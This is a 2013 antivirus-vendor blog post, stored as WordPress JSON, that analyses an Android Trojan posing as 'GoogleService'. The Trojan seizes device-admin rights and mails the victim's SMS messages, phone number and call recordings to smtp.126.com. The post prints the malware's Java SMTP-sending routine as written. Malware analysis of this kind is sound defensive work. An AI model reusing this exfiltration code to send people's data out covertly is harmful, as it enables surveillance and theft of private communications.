{"id":76883,"date":"2013-09-30T18:16:09","date_gmt":"2013-09-30T12:46:09","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=76883"},"modified":"2013-09-30T18:16:09","modified_gmt":"2013-09-30T12:46:09","slug":"the-android-malware-that-exploits-simple-mail-transfer-protocol","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/the-android-malware-that-exploits-simple-mail-transfer-protocol\/","title":{"rendered":"The Android Malware that exploits Simple Mail Transfer Protocol"},"content":{"rendered":"<p style=\"text-align: left;\">Taking about new and sophisticated Android malware, we may have a winner. A malware that uses Simple Mail Transfer Protocol (SMTP) servers to send stolen information to the malware author has made its entry. When it comes to sophistication, this mobile malware is known to outrun most malware families.<\/p>\n<p style=\"text-align: left;\">Part of the mobile malware\u2019s sophistication comes from its high stealth level. This is because such types of malware can gain access to &#8220;Device Admin Right&#8221;.<\/p>\n<p style=\"text-align: left;\"><b><span style=\"text-decoration: underline;\">Quick Facts about the Android SMTP<\/span><\/b><\/p>\n<p style=\"text-align: left;\"><b>What is it and What does it do?<\/b><\/p>\n<p style=\"text-align: left;\">&#8211; Android.Agentsmtp is a Trojan.<\/p>\n<p style=\"text-align: left;\">&#8211; It gets installed in the victim\u2019s device as a genuine application that mimics &#8220;<b>GoogleService<\/b>&#8220;.<\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-76895 aligncenter\" alt=\"android-smtp-malware\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware1.png\" width=\"317\" height=\"350\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><b><span style=\"text-decoration: underline;\">Malware Activity<\/span><\/b><b>:<\/b><\/p>\n<p style=\"text-align: left;\"><b>This is how Android SMTP functions once it is installed:<\/b><\/p>\n<p style=\"text-align: left;\"><b>&#8211;<\/b> Once Android.AgentSmtp is launched, it keeps asking the user to grant &#8220;Device Admin Right&#8221;.<b><br \/>\n<\/b><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware2.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-76896 aligncenter\" alt=\"android-smtp-malware2\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware2.png\" width=\"240\" height=\"432\" \/><\/a><\/p>\n<p style=\"text-align: left;\">&#8211; The screen displays two options &#8211; &#8220;<b>Activate<\/b>&#8221; and &#8220;<b>Cancel<\/b> &#8220;<\/p>\n<p style=\"text-align: left;\">&#8211; Even if the user selects \u201c<b>Cancel<\/b>\u201d, the malicious application takes the administrator rights anyway.<\/p>\n<p style=\"text-align: left;\"><b><span style=\"text-decoration: underline;\">Some More Facts:<\/span><\/b><\/p>\n<p style=\"text-align: left;\">&#8211; When any application gains <b>Admin Right<\/b>, it enables the check box of the following location:<\/p>\n<p style=\"text-align: left;\"><b>Setting -&gt; Security -&gt; Device Administrators -&gt; Apps Name<\/b><\/p>\n<p style=\"text-align: center;\"><a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware11.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-76897 aligncenter\" alt=\"android-smtp-malware1\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware11.png\" width=\"240\" height=\"432\" \/><\/a><\/p>\n<p style=\"text-align: left;\">&#8211; After gaining admin privileges, the application performs the following activities, without the victim&#8217;s knowledge:<\/p>\n<p style=\"text-align: left;\"><strong>1<\/strong>. Collects phone number<\/p>\n<p style=\"text-align: left;\"><strong>2<\/strong>. Collects SMS<\/p>\n<p style=\"text-align: left;\"><strong>3<\/strong>. Records audio &#8211; it even keeps track of start call and stop call<\/p>\n<p style=\"text-align: left;\"><strong>4<\/strong>. It sends all the stolen information to SMTP server smtp.126.com<\/p>\n<p style=\"text-align: center;\" align=\"center\">\u00a0<a href=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware3.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-76898 aligncenter\" alt=\"android-smtp-malware3\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2013\/09\/android-smtp-malware3.png\" width=\"266\" height=\"110\" \/><\/a><\/p>\n<p><b><span style=\"text-decoration: underline;\">Malicious Code<\/span><\/b><b>:<\/b><\/p>\n<p><em>The following is the malicious code snippet of this malware:<\/em><\/p>\n<p>this.from = new InternetAddress(this.sendMail);<\/p>\n<p>this.message.setFrom(this.from);<\/p>\n<p>this.to = new InternetAddress(this.tto);<\/p>\n<p>public boolean send(String paramString1, String paramString2, String paramString3)<\/p>\n<p>{<\/p>\n<p>try<\/p>\n<p>{<\/p>\n<p>this.tto += Smsbody.mail;<\/p>\n<p>this.props = new Properties();<\/p>\n<p>this.props.put(&#8220;mail.smtp.host&#8221;, this.sendMailPath);<\/p>\n<p>this.props.put(&#8220;mail.smtp.auth&#8221;, &#8220;true&#8221;);<\/p>\n<p>this.s = Session.getInstance(this.props);<\/p>\n<p>this.s.setDebug(true);<\/p>\n<p>System.out.println(this.tto);<\/p>\n<p>this.message = new MimeMessage(this.s);<\/p>\n<p>this.from = new InternetAddress(this.sendMail);<\/p>\n<p>this.message.setFrom(this.from);<\/p>\n<p>this.to = new InternetAddress(this.tto);<\/p>\n<p>this.message.setRecipient(Message.RecipientType.TO, this.to);<\/p>\n<p>this.message.setSubject(paramString2);<\/p>\n<p>System.out.println(&#8220;111&#8221; + paramString3);<\/p>\n<p>this.message.setSentDate(new Date());<\/p>\n<p>this.mp = new MimeMultipart();<\/p>\n<p>this.mbpText = new MimeBodyPart();<\/p>\n<p>this.mbpText.setDataHandler(new DataHandler(paramString1 + &#8220;&#8212;-&#8221; + paramString3, &#8220;text\/html;charset=utf-8&#8221;));<\/p>\n<p>this.mp.addBodyPart(this.mbpText);<\/p>\n<p>this.message.setContent(this.mp);<\/p>\n<p>this.message.saveChanges();<\/p>\n<p>this.transport = this.s.getTransport(&#8220;smtp&#8221;);<\/p>\n<p>this.transport.connect(this.sendMailPath, this.sendName, this.sendPassword);<\/p>\n<p>this.transport.sendMessage(this.message, this.message.getAllRecipients());<\/p>\n<p>this.transport.close();<\/p>\n<p>System.out.println(&#8220;\u53d1\u9001\u6210\u529f&#8221;);<\/p>\n<p>return true;<\/p>\n<p>}<\/p>\n<p style=\"text-align: left;\"><strong>Does Quick Heal Protect Android Devices from this Mobile Malware?<\/strong><br \/>\nYes, Quick Heal Mobile Security is equipped with features that resolve infection caused by such malware. If you don&#8217;t have Quick Heal on your device, then you can get it from the <a href=\"https:\/\/play.google.com\/store\/apps\/details?id=com.quickheal.platform&amp;hl=en\" target=\"_blank\">Google Play Store<\/a>.<\/p>\n<p>After installing Quick Heal Mobile Security, take the following steps:<br \/>\n1. Run a Full Scan on your device<br \/>\n2. If Quick Heal detects any such malicious issues (applications gaining admin privileges), it deactivates the admin rights and prompts the user to uninstall the application.<\/p>\n<p>&nbsp;<\/p>\n<p><em>Blog post acknowledgment<\/em> \u2013 Quick Heal Threat Research and Response Team.<b><\/b><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Taking about new and sophisticated Android malware, we may have a winner. A malware that uses Simple Mail Transfer Protocol (SMTP) servers to send stolen information to the malware author has made its entry. When it comes to sophistication, this mobile malware is known to outrun most malware families. Part of the mobile malware\u2019s sophistication [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,24],"tags":[380,586,650],"class_list":["post-76883","post","type-post","status-publish","format-standard","hentry","category-android","category-malware","tag-android-malware","tag-mobile-malware","tag-smtp"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/76883"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=76883"}],"version-history":[{"count":0,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/76883\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=76883"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=76883"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=76883"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}